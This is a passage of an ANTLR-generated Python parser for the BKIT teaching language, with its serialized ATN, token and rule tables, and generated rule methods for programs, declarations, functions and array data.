buf.write(\"\\u00ea\\u00e7\\3\\2\\2\\2\\u00eb\\u00ee\\3\\2\\2\\2\\u00ec\\u00ea\\3\")\n buf.write(\"\\2\\2\\2\\u00ec\\u00ed\\3\\2\\2\\2\\u00ed\\u00f2\\3\\2\\2\\2\\u00ee\\u00ec\")\n buf.write(\"\\3\\2\\2\\2\\u00ef\\u00f1\\5\\\"\\22\\2\\u00f0\\u00ef\\3\\2\\2\\2\\u00f1\")\n buf.write(\"\\u00f4\\3\\2\\2\\2\\u00f2\\u00f0\\3\\2\\2\\2\\u00f2\\u00f3\\3\\2\\2\\2\")\n buf.write(\"\\u00f3!\\3\\2\\2\\2\\u00f4\\u00f2\\3\\2\\2\\2\\u00f5\\u0109\\5$\\23\")\n buf.write(\"\\2\\u00f6\\u0109\\5(\\25\\2\\u00f7\\u0109\\5*\\26\\2\\u00f8\\u0109\")\n buf.write(\"\\5,\\27\\2\\u00f9\\u00fa\\5.\\30\\2\\u00fa\\u00fb\\7<\\2\\2\\u00fb\")\n buf.write(\"\\u0109\\3\\2\\2\\2\\u00fc\\u00fd\\5\\60\\31\\2\\u00fd\\u00fe\\7<\\2\")\n buf.write(\"\\2\\u00fe\\u0109\\3\\2\\2\\2\\u00ff\\u0100\\5\\62\\32\\2\\u0100\\u0101\")\n buf.write(\"\\7<\\2\\2\\u0101\\u0109\\3\\2\\2\\2\\u0102\\u0103\\5\\64\\33\\2\\u0103\")\n buf.write(\"\\u0104\\7<\\2\\2\\u0104\\u0109\\3\\2\\2\\2\\u0105\\u0106\\5\\66\\34\")\n buf.write(\"\\2\\u0106\\u0107\\7<\\2\\2\\u0107\\u0109\\3\\2\\2\\2\\u0108\\u00f5\")\n buf.write(\"\\3\\2\\2\\2\\u0108\\u00f6\\3\\2\\2\\2\\u0108\\u00f7\\3\\2\\2\\2\\u0108\")\n buf.write(\"\\u00f8\\3\\2\\2\\2\\u0108\\u00f9\\3\\2\\2\\2\\u0108\\u00fc\\3\\2\\2\\2\")\n buf.write(\"\\u0108\\u00ff\\3\\2\\2\\2\\u0108\\u0102\\3\\2\\2\\2\\u0108\\u0105\\3\")\n buf.write(\"\\2\\2\\2\\u0109#\\3\\2\\2\\2\\u010a\\u010b\\7\\24\\2\\2\\u010b\\u010c\")\n buf.write(\"\\5> \\2\\u010c\\u010d\\7\\27\\2\\2\\u010d\\u0115\\5 \\21\\2\\u010e\")\n buf.write(\"\\u010f\\7\\r\\2\\2\\u010f\\u0110\\5> \\2\\u0110\\u0111\\7\\27\\2\\2\")\n buf.write(\"\\u0111\\u0112\\5 \\21\\2\\u0112\\u0114\\3\\2\\2\\2\\u0113\\u010e\\3\")\n buf.write(\"\\2\\2\\2\\u0114\\u0117\\3\\2\\2\\2\\u0115\\u0113\\3\\2\\2\\2\\u0115\\u0116\")\n buf.write(\"\\3\\2\\2\\2\\u0116\\u011a\\3\\2\\2\\2\\u0117\\u0115\\3\\2\\2\\2\\u0118\")\n buf.write(\"\\u0119\\7\\f\\2\\2\\u0119\\u011b\\5 \\21\\2\\u011a\\u0118\\3\\2\\2\\2\")\n 
buf.write(\"\\u011a\\u011b\\3\\2\\2\\2\\u011b\\u011c\\3\\2\\2\\2\\u011c\\u011d\\7\")\n buf.write(\"\\16\\2\\2\\u011d\\u011e\\7;\\2\\2\\u011e%\\3\\2\\2\\2\\u011f\\u0120\")\n buf.write(\"\\5\\4\\3\\2\\u0120\\'\\3\\2\\2\\2\\u0121\\u0122\\7\\22\\2\\2\\u0122\\u0123\")\n buf.write(\"\\7\\64\\2\\2\\u0123\\u0124\\58\\35\\2\\u0124\\u0125\\7=\\2\\2\\u0125\")\n buf.write(\"\\u0126\\5:\\36\\2\\u0126\\u0127\\7=\\2\\2\\u0127\\u0128\\5<\\37\\2\")\n buf.write(\"\\u0128\\u0129\\7\\65\\2\\2\\u0129\\u012a\\7\\13\\2\\2\\u012a\\u012b\")\n buf.write(\"\\5 \\21\\2\\u012b\\u012c\\7\\20\\2\\2\\u012c\\u012d\\7;\\2\\2\\u012d\")\n buf.write(\")\\3\\2\\2\\2\\u012e\\u012f\\7\\31\\2\\2\\u012f\\u0130\\5> \\2\\u0130\")\n buf.write(\"\\u0131\\7\\13\\2\\2\\u0131\\u0132\\5 \\21\\2\\u0132\\u0133\\7\\21\\2\")\n buf.write(\"\\2\\u0133\\u0134\\7;\\2\\2\\u0134+\\3\\2\\2\\2\\u0135\\u0136\\7\\13\")\n buf.write(\"\\2\\2\\u0136\\u0137\\5 \\21\\2\\u0137\\u0138\\7\\31\\2\\2\\u0138\\u0139\")\n buf.write(\"\\5> \\2\\u0139\\u013a\\7\\34\\2\\2\\u013a\\u013b\\7;\\2\\2\\u013b-\")\n buf.write(\"\\3\\2\\2\\2\\u013c\\u013f\\5\\26\\f\\2\\u013d\\u013f\\5\\22\\n\\2\\u013e\")\n buf.write(\"\\u013c\\3\\2\\2\\2\\u013e\\u013d\\3\\2\\2\\2\\u013f\\u0140\\3\\2\\2\\2\")\n buf.write(\"\\u0140\\u0141\\7>\\2\\2\\u0141\\u0142\\5> \\2\\u0142/\\3\\2\\2\\2\\u0143\")\n buf.write(\"\\u0144\\7\\t\\2\\2\\u0144\\61\\3\\2\\2\\2\\u0145\\u0146\\7\\n\\2\\2\\u0146\")\n buf.write(\"\\63\\3\\2\\2\\2\\u0147\\u0148\\5R*\\2\\u0148\\65\\3\\2\\2\\2\\u0149\\u014b\")\n buf.write(\"\\7\\26\\2\\2\\u014a\\u014c\\5> \\2\\u014b\\u014a\\3\\2\\2\\2\\u014b\")\n buf.write(\"\\u014c\\3\\2\\2\\2\\u014c\\67\\3\\2\\2\\2\\u014d\\u014e\\5\\22\\n\\2\\u014e\")\n buf.write(\"\\u014f\\7>\\2\\2\\u014f\\u0150\\5> \\2\\u01509\\3\\2\\2\\2\\u0151\\u0152\")\n buf.write(\"\\5> \\2\\u0152;\\3\\2\\2\\2\\u0153\\u0154\\5> \\2\\u0154=\\3\\2\\2\\2\")\n buf.write(\"\\u0155\\u0156\\5@!\\2\\u0156\\u0157\\t\\3\\2\\2\\u0157\\u0158\\5@\")\n 
buf.write(\"!\\2\\u0158\\u015b\\3\\2\\2\\2\\u0159\\u015b\\5@!\\2\\u015a\\u0155\")\n buf.write(\"\\3\\2\\2\\2\\u015a\\u0159\\3\\2\\2\\2\\u015b?\\3\\2\\2\\2\\u015c\\u015d\")\n buf.write(\"\\b!\\1\\2\\u015d\\u015e\\5B\\\"\\2\\u015e\\u0164\\3\\2\\2\\2\\u015f\\u0160\")\n buf.write(\"\\f\\4\\2\\2\\u0160\\u0161\\t\\4\\2\\2\\u0161\\u0163\\5B\\\"\\2\\u0162\")\n buf.write(\"\\u015f\\3\\2\\2\\2\\u0163\\u0166\\3\\2\\2\\2\\u0164\\u0162\\3\\2\\2\\2\")\n buf.write(\"\\u0164\\u0165\\3\\2\\2\\2\\u0165A\\3\\2\\2\\2\\u0166\\u0164\\3\\2\\2\")\n buf.write(\"\\2\\u0167\\u0168\\b\\\"\\1\\2\\u0168\\u0169\\5D#\\2\\u0169\\u016f\\3\")\n buf.write(\"\\2\\2\\2\\u016a\\u016b\\f\\4\\2\\2\\u016b\\u016c\\t\\5\\2\\2\\u016c\\u016e\")\n buf.write(\"\\5D#\\2\\u016d\\u016a\\3\\2\\2\\2\\u016e\\u0171\\3\\2\\2\\2\\u016f\\u016d\")\n buf.write(\"\\3\\2\\2\\2\\u016f\\u0170\\3\\2\\2\\2\\u0170C\\3\\2\\2\\2\\u0171\\u016f\")\n buf.write(\"\\3\\2\\2\\2\\u0172\\u0173\\b#\\1\\2\\u0173\\u0174\\5F$\\2\\u0174\\u017a\")\n buf.write(\"\\3\\2\\2\\2\\u0175\\u0176\\f\\4\\2\\2\\u0176\\u0177\\t\\6\\2\\2\\u0177\")\n buf.write(\"\\u0179\\5F$\\2\\u0178\\u0175\\3\\2\\2\\2\\u0179\\u017c\\3\\2\\2\\2\\u017a\")\n buf.write(\"\\u0178\\3\\2\\2\\2\\u017a\\u017b\\3\\2\\2\\2\\u017bE\\3\\2\\2\\2\\u017c\")\n buf.write(\"\\u017a\\3\\2\\2\\2\\u017d\\u017e\\7&\\2\\2\\u017e\\u0181\\5F$\\2\\u017f\")\n buf.write(\"\\u0181\\5H%\\2\\u0180\\u017d\\3\\2\\2\\2\\u0180\\u017f\\3\\2\\2\\2\\u0181\")\n buf.write(\"G\\3\\2\\2\\2\\u0182\\u0183\\t\\7\\2\\2\\u0183\\u0186\\5H%\\2\\u0184\")\n buf.write(\"\\u0186\\5J&\\2\\u0185\\u0182\\3\\2\\2\\2\\u0185\\u0184\\3\\2\\2\\2\\u0186\")\n buf.write(\"I\\3\\2\\2\\2\\u0187\\u0188\\5L\\'\\2\\u0188\\u0189\\5T+\\2\\u0189\\u018c\")\n buf.write(\"\\3\\2\\2\\2\\u018a\\u018c\\5L\\'\\2\\u018b\\u0187\\3\\2\\2\\2\\u018b\")\n buf.write(\"\\u018a\\3\\2\\2\\2\\u018cK\\3\\2\\2\\2\\u018d\\u0190\\5R*\\2\\u018e\")\n buf.write(\"\\u0190\\5N(\\2\\u018f\\u018d\\3\\2\\2\\2\\u018f\\u018e\\3\\2\\2\\2\\u0190\")\n 
buf.write(\"M\\3\\2\\2\\2\\u0191\\u0197\\5P)\\2\\u0192\\u0193\\7\\64\\2\\2\\u0193\")\n buf.write(\"\\u0194\\5> \\2\\u0194\\u0195\\7\\65\\2\\2\\u0195\\u0197\\3\\2\\2\\2\")\n buf.write(\"\\u0196\\u0191\\3\\2\\2\\2\\u0196\\u0192\\3\\2\\2\\2\\u0197O\\3\\2\\2\")\n buf.write(\"\\2\\u0198\\u019c\\5\\24\\13\\2\\u0199\\u019c\\5\\n\\6\\2\\u019a\\u019c\")\n buf.write(\"\\5\\f\\7\\2\\u019b\\u0198\\3\\2\\2\\2\\u019b\\u0199\\3\\2\\2\\2\\u019b\")\n buf.write(\"\\u019a\\3\\2\\2\\2\\u019cQ\\3\\2\\2\\2\\u019d\\u019e\\7\\3\\2\\2\\u019e\")\n buf.write(\"\\u01a9\\7\\64\\2\\2\\u019f\\u01a4\\5> \\2\\u01a0\\u01a1\\7=\\2\\2\\u01a1\")\n buf.write(\"\\u01a3\\5> \\2\\u01a2\\u01a0\\3\\2\\2\\2\\u01a3\\u01a6\\3\\2\\2\\2\\u01a4\")\n buf.write(\"\\u01a2\\3\\2\\2\\2\\u01a4\\u01a5\\3\\2\\2\\2\\u01a5\\u01a8\\3\\2\\2\\2\")\n buf.write(\"\\u01a6\\u01a4\\3\\2\\2\\2\\u01a7\\u019f\\3\\2\\2\\2\\u01a8\\u01ab\\3\")\n buf.write(\"\\2\\2\\2\\u01a9\\u01a7\\3\\2\\2\\2\\u01a9\\u01aa\\3\\2\\2\\2\\u01aa\\u01ac\")\n buf.write(\"\\3\\2\\2\\2\\u01ab\\u01a9\\3\\2\\2\\2\\u01ac\\u01ad\\7\\65\\2\\2\\u01ad\")\n buf.write(\"S\\3\\2\\2\\2\\u01ae\\u01af\\7\\66\\2\\2\\u01af\\u01b0\\5> \\2\\u01b0\")\n buf.write(\"\\u01b1\\7\\67\\2\\2\\u01b1\\u01b8\\3\\2\\2\\2\\u01b2\\u01b3\\7\\66\\2\")\n buf.write(\"\\2\\u01b3\\u01b4\\5> \\2\\u01b4\\u01b5\\7\\67\\2\\2\\u01b5\\u01b6\")\n buf.write(\"\\5T+\\2\\u01b6\\u01b8\\3\\2\\2\\2\\u01b7\\u01ae\\3\\2\\2\\2\\u01b7\\u01b2\")\n buf.write(\"\\3\\2\\2\\2\\u01b8U\\3\\2\\2\\2*[apy\\177\\u0090\\u0095\\u0099\\u009c\")\n buf.write(\"\\u00a2\\u00a7\\u00ab\\u00b6\\u00b9\\u00bf\\u00c5\\u00cd\\u00d0\")\n buf.write(\"\\u00d5\\u00e4\\u00ec\\u00f2\\u0108\\u0115\\u011a\\u013e\\u014b\")\n buf.write(\"\\u015a\\u0164\\u016f\\u017a\\u0180\\u0185\\u018b\\u018f\\u0196\")\n buf.write(\"\\u019b\\u01a4\\u01a9\\u01b7\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in 
enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"'Body'\", \"'Break'\", \"'Continue'\", \n \"'Do'\", \"'Else'\", \"'ElseIf'\", \"'EndIf'\", \"'EndBody'\", \n \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \"'If'\", \n \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \n \"'-.'\", \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \n \"'&&'\", \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \n \"'>='\", \"'=/='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \n \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \n \"';'\", \"','\", \"'='\", \"'\\\"'\", \"'int_of_float'\", \"'int_of_string'\", \n \"'float_to_int'\", \"'float_of_string'\", \"'bool_of_string'\", \n \"'string_of_bool'\", \"'string_of_int'\", \"'string_of_float'\" ]\n\n symbolicNames = [ \"<INVALID>\", \"ID\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \n \"STRING_LIT\", \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \n \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \n \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \n \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \n \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \n \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \n \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \n \"DOUBLE_QUOTE\", \"INT_OF_FLOAT\", \"INT_OF_STRING\", 
\"FLOAT_TO_INT\", \n \"FLOAT_OF_STRING\", \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \n \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \"COMMENT\", \"WS\", \n \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_array = 3\n RULE_primitive_data = 4\n RULE_composite_data = 5\n RULE_array_lit = 6\n RULE_var_list = 7\n RULE_scalar_var = 8\n RULE_var_non_init = 9\n RULE_composite_var = 10\n RULE_var_init = 11\n RULE_composite_init = 12\n RULE_primitive_init = 13\n RULE_params_list = 14\n RULE_stmt_list = 15\n RULE_stmt = 16\n RULE_if_stmt = 17\n RULE_var_declare_stmt = 18\n RULE_for_stmt = 19\n RULE_while_stmt = 20\n RULE_dowhile_stmt = 21\n RULE_assign_stmt = 22\n RULE_break_stmt = 23\n RULE_continue_stmt = 24\n RULE_call_stmt = 25\n RULE_return_stmt = 26\n RULE_init_for = 27\n RULE_con_for = 28\n RULE_update_for = 29\n RULE_expr = 30\n RULE_expr1 = 31\n RULE_expr2 = 32\n RULE_expr3 = 33\n RULE_expr4 = 34\n RULE_expr5 = 35\n RULE_expr6 = 36\n RULE_expr7 = 37\n RULE_expr8 = 38\n RULE_operand = 39\n RULE_function_call = 40\n RULE_index_op = 41\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"array\", \n \"primitive_data\", \"composite_data\", \"array_lit\", \"var_list\", \n \"scalar_var\", \"var_non_init\", \"composite_var\", \"var_init\", \n \"composite_init\", \"primitive_init\", \"params_list\", \"stmt_list\", \n \"stmt\", \"if_stmt\", \"var_declare_stmt\", \"for_stmt\", \"while_stmt\", \n \"dowhile_stmt\", \"assign_stmt\", \"break_stmt\", \"continue_stmt\", \n \"call_stmt\", \"return_stmt\", \"init_for\", \"con_for\", \"update_for\", \n \"expr\", \"expr1\", \"expr2\", \"expr3\", \"expr4\", \"expr5\", \n \"expr6\", \"expr7\", \"expr8\", \"operand\", \"function_call\", \n \"index_op\" ]\n\n EOF = Token.EOF\n ID=1\n INT_LIT=2\n FLOAT_LIT=3\n BOOL_LIT=4\n STRING_LIT=5\n BODY=6\n BREAK=7\n CONTINUE=8\n DO=9\n ELSE=10\n ELSEIF=11\n ENDIF=12\n 
ENDBODY=13\n ENDFOR=14\n ENDWHILE=15\n FOR=16\n FUNCTION=17\n IF=18\n PARAMETER=19\n RETURN=20\n THEN=21\n VAR=22\n WHILE=23\n TRUE=24\n FALSE=25\n ENDDO=26\n PLUS_INT=27\n PLUS_FLOAT=28\n MINUS_INT=29\n MINUS_FLOAT=30\n STAR_INT=31\n STAR_FLOAT=32\n DIV_INT=33\n DIV_FLOAT=34\n MOD=35\n NOT=36\n AND=37\n OR=38\n EQUAL=39\n NOT_EQUAL_INT=40\n LESS_INT=41\n GREATER_INT=42\n LESS_OR_EQUAL_INT=43\n GREATER_OR_EQUAL_INT=44\n NOT_EQUAL_FLOAT=45\n LESS_FLOAT=46\n GREATER_FLOAT=47\n LESS_OR_EQUAL_FLOAT=48\n GREATER_OR_EQUAL_FLOAT=49\n LEFT_PAREN=50\n RIGHT_PAREN=51\n LEFT_BRACKET=52\n RIGHT_BRACKET=53\n LEFT_BRACE=54\n RIGHT_BRACE=55\n COLON=56\n DOT=57\n SEMI=58\n COMMA=59\n ASSIGN=60\n DOUBLE_QUOTE=61\n INT_OF_FLOAT=62\n INT_OF_STRING=63\n FLOAT_TO_INT=64\n FLOAT_OF_STRING=65\n BOOL_OF_STRING=66\n STRING_OF_BOOL=67\n STRING_OF_INT=68\n STRING_OF_FLOAT=69\n COMMENT=70\n WS=71\n ILLEGAL_ESCAPE=72\n UNCLOSE_STRING=73\n UNTERMINATED_COMMENT=74\n ERROR_CHAR=75\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return 
self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitProgram\" ):\n return visitor.visitProgram(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 89\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 84\n self.var_declare()\n self.state = 85\n self.match(BKITParser.SEMI)\n self.state = 91\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 95\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.FUNCTION:\n self.state = 92\n self.function_declare()\n self.state = 97\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 98\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def COLON(self):\n return self.getToken(BKITParser.COLON, 0)\n\n def var_list(self):\n return self.getTypedRuleContext(BKITParser.Var_listContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitVar_declare\" ):\n return visitor.visitVar_declare(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, 
self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 100\n self.match(BKITParser.VAR)\n self.state = 101\n self.match(BKITParser.COLON)\n self.state = 102\n self.var_list()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FUNCTION(self):\n return self.getToken(BKITParser.FUNCTION, 0)\n\n def COLON(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COLON)\n else:\n return self.getToken(BKITParser.COLON, i)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def BODY(self):\n return self.getToken(BKITParser.BODY, 0)\n\n def ENDBODY(self):\n return self.getToken(BKITParser.ENDBODY, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def PARAMETER(self):\n return self.getToken(BKITParser.PARAMETER, 0)\n\n def params_list(self):\n return self.getTypedRuleContext(BKITParser.Params_listContext,0)\n\n\n def var_declare_stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declare_stmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declare_stmtContext,i)\n\n\n def SEMI(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.SEMI)\n else:\n return self.getToken(BKITParser.SEMI, i)\n\n def stmt(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.StmtContext)\n else:\n return self.getTypedRuleContext(BKITParser.StmtContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitFunction_declare\" ):\n return 
visitor.visitFunction_declare(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 104\n self.match(BKITParser.FUNCTION)\n self.state = 105\n self.match(BKITParser.COLON)\n self.state = 106\n self.match(BKITParser.ID)\n self.state = 110\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if _la==BKITParser.PARAMETER:\n self.state = 107\n self.match(BKITParser.PARAMETER)\n self.state = 108\n self.match(BKITParser.COLON)\n self.state = 109\n self.params_list()\n\n\n self.state = 112\n self.match(BKITParser.BODY)\n self.state = 113\n self.match(BKITParser.COLON)\n self.state = 119\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.VAR:\n self.state = 114\n self.var_declare_stmt()\n self.state = 115\n self.match(BKITParser.SEMI)\n self.state = 121\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 125\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.BREAK) | (1 << BKITParser.CONTINUE) | (1 << BKITParser.DO) | (1 << BKITParser.FOR) | (1 << BKITParser.IF) | (1 << BKITParser.RETURN) | (1 << BKITParser.WHILE))) != 0):\n self.state = 122\n self.stmt()\n self.state = 127\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 128\n self.match(BKITParser.ENDBODY)\n self.state = 129\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ArrayContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, 
invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_array\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitArray\" ):\n return visitor.visitArray(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def array(self):\n\n localctx = BKITParser.ArrayContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_array)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 131\n self.match(BKITParser.ID)\n self.state = 132\n self.match(BKITParser.ASSIGN)\n self.state = 133\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_dataContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT_LIT(self):\n return self.getToken(BKITParser.INT_LIT, 0)\n\n def FLOAT_LIT(self):\n return self.getToken(BKITParser.FLOAT_LIT, 0)\n\n def STRING_LIT(self):\n return self.getToken(BKITParser.STRING_LIT, 0)\n\n def BOOL_LIT(self):\n return self.getToken(BKITParser.BOOL_LIT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_data\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitPrimitive_data\" ):\n return visitor.visitPrimitive_data(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def primitive_data(self):\n\n localctx = BKITParser.Primitive_dataContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_primitive_data)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 135\n _la 
= self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_dataContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_data\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitComposite_data\" ):\n return visitor.visitComposite_data(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def composite_data(self):\n\n localctx = BKITParser.Composite_dataContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_composite_data)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 137\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Array_litContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def primitive_data(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Primitive_dataContext)\n else:\n return 
